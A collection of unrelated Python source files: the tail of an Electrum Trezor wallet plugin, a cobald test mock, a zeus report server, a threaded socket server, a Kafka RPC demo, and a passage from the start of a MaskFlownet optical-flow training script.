client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d" % (derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0" * 32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
# btn diff
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = btn_addr_to_bitcoin_addr(address)
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
mock.py
|
import contextlib
import threading
import cobald.daemon
from cobald.daemon.runners.service import ServiceRunner
from cobald.interfaces import Pool, Controller
class MockController(Controller):
@property
def demand(self):
return self.target.demand
@demand.setter
def demand(self, value: float):
self.target.demand = value
@property
def supply(self):
return self.target.supply
@property
def utilisation(self):
return self.target.utilisation
@property
def allocation(self):
return self.target.allocation
class MockPool(Pool):
"""Pool allowing to set every attribute"""
demand, supply, allocation, utilisation = 0, 0, 0, 0
def __init__(self, demand=0, supply=0, allocation=0.5, utilisation=0.5):
self.demand = demand
self.supply = supply
self.allocation = allocation
self.utilisation = utilisation
@contextlib.contextmanager
def accept_services(payload: ServiceRunner = None, name=None):
"""Accept ``cobald`` services and temporarily replace ``cobald.daemon.runtime``"""
payload = payload if payload is not None else ServiceRunner(accept_delay=0.1)
thread = threading.Thread(
target=payload.accept, name=name or str(payload), daemon=True
)
thread.start()
if not payload.running.wait(1):
raise RuntimeError('%s failed to start' % payload)
prev_runner = cobald.daemon.runtime
cobald.daemon.runtime = payload
try:
yield
finally:
cobald.daemon.runtime = prev_runner
payload.shutdown()
thread.join()
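# Illustrative usage sketch (assumption, not part of the original module): running test
# code against a temporary ServiceRunner so that cobald services are actually accepted.
#
#     with accept_services(name='test-runner'):
#         pool = MockPool(demand=4, supply=2)
#         controller = MockController(pool)  # hypothetical wiring for a test
#         assert controller.demand == 4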
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import traceback
import pickle
from copy import deepcopy
import numpy as np
import pandas as pd
import pareto
import time
from threading import Thread
from collections import OrderedDict
import zeus
from zeus.common import FileOps, TaskOps
from zeus.common.general import General
from zeus.report.share_memory import ShareMemory, ShareMemoryClient
from .nsga_iii import SortAndSelectPopulation
from .record import ReportRecord
class ReportServer(object):
"""Report class to save all records and broadcast records to share memory."""
_hist_records = OrderedDict()
__instances__ = None
__variables__ = set()
def __new__(cls, *args, **kwargs):
"""Override new method, singleton."""
if not cls.__instances__:
cls.__instances__ = super().__new__(cls, *args, **kwargs)
cls._thread_runing = True
cls._thread = cls._run_monitor_thread()
return cls.__instances__
def add(self, record):
"""Add one record into set."""
self._hist_records[record.uid] = record
@classmethod
def add_watched_var(cls, step_name, worker_id):
"""Add variable to ReportServer."""
cls.__variables__.add("{}.{}".format(step_name, worker_id))
@classmethod
def remove_watched_var(cls, step_name, worker_id):
"""Remove variable from ReportServer."""
key = "{}.{}".format(step_name, worker_id)
if key in cls.__variables__:
cls.__variables__.remove(key)
@classmethod
def stop(cls):
"""Stop report server."""
if hasattr(ReportServer, "_thread_runing") and ReportServer._thread_runing:
ReportServer._thread_runing = False
ReportServer._thread.join()
ShareMemoryClient().close()
@classmethod
def renew(cls):
"""Renew report server."""
if not hasattr(ReportServer, "_thread_runing") or not ReportServer._thread_runing:
ReportServer._thread_runing = True
ReportServer._thread = ReportServer._run_monitor_thread()
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance, desc=record.desc) for record in
records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
in_pareto = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
in_pareto = [item for item in in_pareto if None not in item]
if not in_pareto:
return None, None
try:
fitness = np.array(in_pareto)
if fitness.shape[1] != 1 and nums is not None and len(in_pareto) > nums:
                # len must be larger than nums, otherwise this would loop forever
_, res, selected = SortAndSelectPopulation(fitness.T, nums)
else:
outs = pareto.eps_sort(fitness, maximize_all=True, attribution=True)
res, selected = np.array(outs)[:, :-2], np.array(outs)[:, -1].astype(np.int32)
return res.tolist(), selected.tolist()
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return [], []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
if isinstance(records[0].rewards, list):
not_finished = [x.worker_id for x in records if None in x.rewards]
records = [x for x in records if None not in x.rewards]
else:
not_finished = [x.worker_id for x in records if x.rewards is None]
records = [x for x in records if x.rewards is not None]
if not_finished:
logging.warning("Workers not finished: {}".format(not_finished))
outs, selected = self.pareto_front(step_name, nums, records=records)
if not outs:
return []
if choice is not None:
selected = self._select_one_record(outs, choice)
return [records[idx] for idx in selected]
def _select_one_record(self, outs, choice='normal'):
"""Select one record."""
if choice == 'normal':
outs = np.array(outs).reshape(-1, 1).tolist()
prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(outs[0]) + 1)]
prob_temp = prob
for idx, out in enumerate(outs):
sorted_ind = np.argsort(out)
for idx, ind in enumerate(sorted_ind):
prob[ind] += prob_temp[idx]
normalization = [float(i) / float(sum(prob)) for i in prob]
return [np.random.choice(len(outs[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def dump(self):
"""Dump report to file."""
try:
_file = FileOps.join_path(TaskOps().step_path, "reports.json")
FileOps.make_base_dir(_file)
data = {}
for record in self.all_records:
if record.step_name in data:
data[record.step_name].append(record.to_dict())
else:
data[record.step_name] = [record.to_dict()]
with open(_file, "w") as f:
json.dump(data, f, indent=4)
_file = os.path.join(TaskOps().step_path, ".reports")
_dump_data = [ReportServer._hist_records, ReportServer.__instances__]
with open(_file, "wb") as f:
pickle.dump(_dump_data, f, protocol=pickle.HIGHEST_PROTOCOL)
self.backup_output_path()
except Exception:
logging.warning(traceback.format_exc())
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if zeus.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif zeus.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
@classmethod
def _run_monitor_thread(cls):
try:
logging.debug("Start report monitor thread.")
monitor_thread = Thread(target=ReportServer._monitor_thread, args=(cls.__instances__,))
monitor_thread.daemon = True
monitor_thread.start()
return monitor_thread
except Exception as e:
logging.error("Failed to run report monitor thread.")
raise e
@staticmethod
def _monitor_thread(report_server):
while report_server and report_server._thread_runing:
watched_vars = deepcopy(ReportServer.__variables__)
saved_records = report_server.all_records
for var in watched_vars:
step_name, worker_id = var.split(".")
if step_name != General.step_name:
continue
record_dict = None
try:
record_dict = ShareMemory(var).get()
except Exception:
logging.warning("Failed to get record, step name: {}, worker id: {}.".format(step_name, worker_id))
if record_dict:
record = ReportRecord().from_dict(record_dict)
saved_record = list(filter(
lambda x: x.step_name == step_name and str(x.worker_id) == str(worker_id), saved_records))
if not saved_record:
report_server.add(record)
ReportServer().dump()
else:
_ = record.code
if record.code != saved_record[0].code:
report_server.add(record)
ReportServer().dump()
ShareMemory(var).close()
time.sleep(0.2)
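# Illustrative usage sketch (assumption, not part of the original module): ReportServer
# is a singleton, so repeated construction returns the same instance and records
# accumulate in the shared history.
#
#     server = ReportServer()
#     pareto_records = server.get_pareto_front_records(step_name="nas", nums=5)
#     best = server.print_best(step_name="nas")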
|
server.py
|
import socket
from threading import Thread
from client_handler import ClientHandler
class Server(object):
"""
The server class implements a server socket that can handle multiple client connections.
    It is really important to handle any exception that may occur, because other clients
    are using the server too and may be unaware of it. So the server must not be stopped
    when an exception occurs; instead, a proper message needs to be shown in the
    server console.
"""
MAX_NUM_CONN = 10 # keeps 10 clients in queue
def __init__(self, host="localhost", port=12000):
self.host = host
self.port = port
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP socket over IPv4
        self.handlers = {}  # maps client address -> ClientHandler
def _bind(self):
"""
:return: VOID
"""
self.server.bind((self.host, self.port))
def _listen(self):
"""
:return: VOID
"""
try:
self._bind()
self.server.listen(Server.MAX_NUM_CONN)
print("Server is running without issues")
print("Server listening at {}/{}".format(self.host, self.port))
except (ConnectionError, ConnectionAbortedError, ConnectionRefusedError, OSError) as err:
print(type(err), err)
def _accept_clients(self):
"""
:return: VOID
"""
while True:
clientsocket, addr = self.server.accept()
Thread(target=self._handler, args=(clientsocket, addr)).start() # start client thread
def _handler(self, clientsocket, addr):
"""
        :param clientsocket: the socket object returned by accept() for this client
        :param addr: the (host, port) address of the connected client, used as the key in self.handlers
"""
clienthandler = ClientHandler(self, clientsocket, addr)
        self.handlers[addr] = clienthandler  # set the client address as key and its ClientHandler as value
clienthandler.run()
def run(self):
"""
Run the server.
:return: VOID
"""
self._listen()
self._accept_clients()
if __name__ == '__main__':
server = Server()
server.run()
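# Illustrative client sketch (assumption; the actual wire protocol is defined by the
# ClientHandler class, which is not shown here):
#
#     import socket
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(("localhost", 12000))
#     ...  # exchange data according to the ClientHandler protocol
#     client.close()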
|
kafka_rpc_server_multiple_topics_demo.py
|
# Copyright (c) 2017-2020, Carl Cheung
# All rights reserved.
"""
Two Basic Kafka RPC Servers
"""
import time
from multiprocessing import Process
from kafka_rpc import KRPCServer
def start_server1():
# Part1: define a class
class Sum:
def add(self, x, y):
return x + y
# Part2: instantiate a class to an object
s = Sum()
    # assuming your kafka broker is on 0.0.0.0:9092
krs = KRPCServer('localhost:9092', handle=s, topic_name='sum')
krs.server_forever()
def start_server2():
# Part1: define a class
class Diff:
def minus(self, x, y):
return x - y
# Part2: instantiate a class to an object
d = Diff()
    # assuming your kafka broker is on 0.0.0.0:9092
krs = KRPCServer('localhost:9092', handle=d, topic_name='diff')
krs.server_forever()
p1 = Process(target=start_server1, daemon=True)
p1.start()
p2 = Process(target=start_server2, daemon=True)
p2.start()
while True:
time.sleep(1)
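# Illustrative client sketch (assumption: the kafka_rpc package exposes a KRPCClient
# whose constructor mirrors KRPCServer; the method and attribute names below rest on
# that assumption and may differ between library versions):
#
#     from kafka_rpc import KRPCClient
#     sum_client = KRPCClient('localhost:9092', topic_name='sum')
#     diff_client = KRPCClient('localhost:9092', topic_name='diff')
#     print(sum_client.add(1, 2), diff_client.minus(5, 3))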
|
main.py
|
import os
import sys
import argparse
from timeit import default_timer
import yaml
import hashlib
import socket
# ======== PLEASE MODIFY ========
# where is the repo
repoRoot = r'.'
# to CUDA\vX.Y\bin
os.environ['PATH'] = r'path\to\your\NVIDIA GPU Computing Toolkit\CUDA\v9.0\bin' + ';' + os.environ['PATH']
# Flying Chairs Dataset
chairs_path = r'path\to\your\FlyingChairs_release\data'
chairs_split_file = r'path\to\your\FlyingChairs_release\FlyingChairs_train_val.txt'
import numpy as np
import mxnet as mx
# data readers
from reader.chairs import binary_reader, trainval, ppm, flo
from reader import sintel, kitti, hd1k, things3d
import cv2
model_parser = argparse.ArgumentParser(add_help=False)
training_parser = argparse.ArgumentParser(add_help=False)
training_parser.add_argument('--batch', type=int, default=8, help='minibatch size of samples per device')
parser = argparse.ArgumentParser(parents=[model_parser, training_parser])
parser.add_argument('config', type=str, nargs='?', default=None)
parser.add_argument('--dataset_cfg', type=str, default='chairs.yaml')
# proportion of data to be loaded
# for example, if shard = 4, then one fourth of data is loaded
# ONLY for things3d dataset (as it is very large)
parser.add_argument('-s', '--shard', type=int, default=1, help='load 1/shard of the data (only for the things3d dataset)')
parser.add_argument('-g', '--gpu_device', type=str, default='', help='Specify gpu device(s)')
parser.add_argument('-c', '--checkpoint', type=str, default=None,
                    help='model checkpoint to load; by default, the latest one. '
                         'You can use checkpoint:steps to load a specific step')
parser.add_argument('--clear_steps', action='store_true')
# the choice of network
parser.add_argument('-n', '--network', type=str, default='MaskFlownet')
# three modes
parser.add_argument('--debug', action='store_true', help='Do debug')
parser.add_argument('--valid', action='store_true', help='Do validation')
parser.add_argument('--predict', action='store_true', help='Do prediction')
# inference resize for validation and prediction
parser.add_argument('--resize', type=str, default='')
args = parser.parse_args()
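# Illustrative invocations (assumptions; the config and checkpoint names are hypothetical,
# the options are the ones defined above):
#
#     python main.py MaskFlownet.yaml --dataset_cfg chairs.yaml -g 0,1
#     python main.py MaskFlownet.yaml -c abcNov03-1532:300000 --valid -g 0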
ctx = [mx.cpu()] if args.gpu_device == '' else [mx.gpu(gpu_id) for gpu_id in map(int, args.gpu_device.split(','))]
infer_resize = [int(s) for s in args.resize.split(',')] if args.resize else None
import network.config
# load network configuration
with open(os.path.join(repoRoot, 'network', 'config', args.config)) as f:
config = network.config.Reader(yaml.load(f))
# load training configuration
with open(os.path.join(repoRoot, 'network', 'config', args.dataset_cfg)) as f:
dataset_cfg = network.config.Reader(yaml.load(f))
validation_steps = dataset_cfg.validation_steps.value
checkpoint_steps = dataset_cfg.checkpoint_steps.value
# create directories
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
mkdir('logs')
mkdir(os.path.join('logs', 'val'))
mkdir(os.path.join('logs', 'debug'))
mkdir('weights')
mkdir('flows')
# find checkpoint
import path
import logger
steps = 0
if args.checkpoint is not None:
if ':' in args.checkpoint:
prefix, steps = args.checkpoint.split(':')
else:
prefix = args.checkpoint
steps = None
log_file, run_id = path.find_log(prefix)
if steps is None:
checkpoint, steps = path.find_checkpoints(run_id)[-1]
else:
checkpoints = path.find_checkpoints(run_id)
try:
checkpoint, steps = next(filter(lambda t : t[1] == steps, checkpoints))
except StopIteration:
print('The steps not found in checkpoints', steps, checkpoints)
sys.stdout.flush()
raise StopIteration
steps = int(steps)
if args.clear_steps:
steps = 0
else:
_, exp_info = path.read_log(log_file)
exp_info = exp_info[-1]
for k in args.__dict__:
if k in exp_info and k in ('tag',):
setattr(args, k, eval(exp_info[k]))
print('{}={}, '.format(k, exp_info[k]), end='')
print()
sys.stdout.flush()
# generate id
if args.checkpoint is None or args.clear_steps:
uid = (socket.gethostname() + logger.FileLog._localtime().strftime('%b%d-%H%M') + args.gpu_device)
tag = hashlib.sha224(uid.encode()).hexdigest()[:3]
run_id = tag + logger.FileLog._localtime().strftime('%b%d-%H%M')
# initiate
from network import get_pipeline
pipe = get_pipeline(args.network, ctx=ctx, config=config)
lr_schedule = dataset_cfg.optimizer.learning_rate.get(None)
if lr_schedule is not None:
pipe.lr_schedule = lr_schedule
# load parameters from given checkpoint
if args.checkpoint is not None:
print('Load Checkpoint {}'.format(checkpoint))
sys.stdout.flush()
network_class = getattr(config.network, 'class').get()
# if train the head-stack network for the first time
if network_class == 'MaskFlownet' and args.clear_steps and dataset_cfg.dataset.value == 'chairs':
print('load the weight for the head network only')
pipe.load_head(checkpoint)
else:
print('load the weight for the network')
pipe.load(checkpoint)
if network_class == 'MaskFlownet':
print('fix the weight for the head network')
pipe.fix_head()
sys.stdout.flush()
if not args.valid and not args.predict and not args.clear_steps:
pipe.trainer.step(100, ignore_stale_grad=True)
pipe.trainer.load_states(checkpoint.replace('params', 'states'))
# ======== If to do prediction ========
if args.predict:
import predict
checkpoint_name = os.path.basename(checkpoint).replace('.params', '')
predict.predict(pipe, os.path.join(repoRoot, 'flows', checkpoint_name), batch_size=args.batch, resize = infer_resize)
sys.exit(0)
# ======== If to do validation ========
def validate():
validation_result = {}
for dataset_name in validation_datasets:
validation_result[dataset_name] = pipe.validate(*validation_datasets[dataset_name], batch_size = args.batch)
return validation_result
if args.valid:
log = logger.FileLog(os.path.join(repoRoot, 'logs', 'val', '{}.val.log'.format(run_id)), screen=True)
# sintel
sintel_dataset = sintel.list_data()
for div in ('training2', 'training'):
for k, dataset in sintel_dataset[div].items():
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
val_epe = pipe.validate(img1, img2, flow, mask, batch_size=args.batch, resize = infer_resize)
log.log('steps={}, sintel.{}.{}:epe={}'.format(steps, div, k, val_epe))
sys.stdout.flush()
# kitti
read_resize = (370, 1224) # if infer_resize is None else infer_resize
for kitti_version in ('2012', '2015'):
dataset = kitti.read_dataset(editions = kitti_version, parts = 'mixed', resize = read_resize)
val_epe = pipe.validate(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'], batch_size=args.batch, resize = infer_resize, return_type = 'epe')
log.log('steps={}, kitti.{}:epe={}'.format(steps, kitti_version, val_epe))
sys.stdout.flush()
val_epe = pipe.validate(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'], batch_size=args.batch, resize = infer_resize, return_type = 'kitti')
log.log('steps={}, kitti.{}:kitti={}'.format(steps, kitti_version, val_epe))
sys.stdout.flush()
log.close()
sys.exit(0)
# ======== If to do training ========
# load training/validation datasets
validation_datasets = {}
samples = 32 if args.debug else -1
t0 = default_timer()
if dataset_cfg.dataset.value == 'kitti':
batch_size = 4
print('loading kitti dataset ...')
sys.stdout.flush()
orig_shape = dataset_cfg.orig_shape.get([370, 1224])
resize_shape = (orig_shape[1], orig_shape[0])
parts = 'mixed' if dataset_cfg.train_all.get(False) else 'train'
# training
dataset = kitti.read_dataset(editions = 'mixed', parts = parts, samples = samples, resize = resize_shape)
trainSize = len(dataset['flow'])
training_datasets = [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * batch_size
# validation
validationSize = 0
dataset = kitti.read_dataset(editions = '2012', parts = 'valid', samples = samples, resize = resize_shape)
validationSize += len(dataset['flow'])
validation_datasets['kitti.12'] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
dataset = kitti.read_dataset(editions = '2015', parts = 'valid', samples = samples, resize = resize_shape)
validationSize += len(dataset['flow'])
validation_datasets['kitti.15'] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
elif dataset_cfg.dataset.value == 'sintel':
batch_size = 4
print('loading sintel dataset ...')
sys.stdout.flush()
orig_shape = [436, 1024]
num_kitti = dataset_cfg.kitti.get(0)
num_hd1k = dataset_cfg.hd1k.get(0)
subsets = ('training' if dataset_cfg.train_all.get(False) else 'training1', 'training2')
# training
trainImg1 = []
trainImg2 = []
trainFlow = []
trainMask = []
sintel_dataset = sintel.list_data()
for k, dataset in sintel_dataset[subsets[0]].items():
dataset = dataset[:samples]
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
trainImg1.extend(img1)
trainImg2.extend(img2)
trainFlow.extend(flow)
trainMask.extend(mask)
trainSize = len(trainMask)
training_datasets = [(trainImg1, trainImg2, trainFlow, trainMask)] * (batch_size - num_kitti - num_hd1k)
resize_shape = (1024, dataset_cfg.resize_shape.get(436))
if num_kitti > 0:
print('loading kitti dataset ...')
sys.stdout.flush()
editions = '2015'
dataset = kitti.read_dataset(resize = resize_shape, samples = samples, editions = editions)
trainSize += len(dataset['flow'])
training_datasets += [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * num_kitti
if num_hd1k > 0:
print('loading hd1k dataset ...')
sys.stdout.flush()
dataset = hd1k.read_dataset(resize = resize_shape, samples = samples)
trainSize += len(dataset['flow'])
training_datasets += [(dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])] * num_hd1k
# validation
validationSize = 0
for k, dataset in sintel_dataset[subsets[1]].items():
dataset = dataset[:samples]
